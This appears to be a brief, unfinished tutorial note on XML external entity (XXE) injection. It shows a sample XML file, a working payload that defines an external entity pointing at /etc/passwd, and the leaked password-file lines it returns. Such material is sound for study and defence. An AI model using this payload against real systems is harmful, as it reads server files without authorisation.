XXE Injection (WIP)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY > <!--Allows any input without validation-->
<!ELEMENT name (#PCDATA)>
]>
<data>
<name>example</name>
</data><?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <!-- Defining the External Entity-->
<data>
<name>&xxe;</name> <!--Calling the External Entity -->
</data><data>
<name>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
</name>
</data>Last updated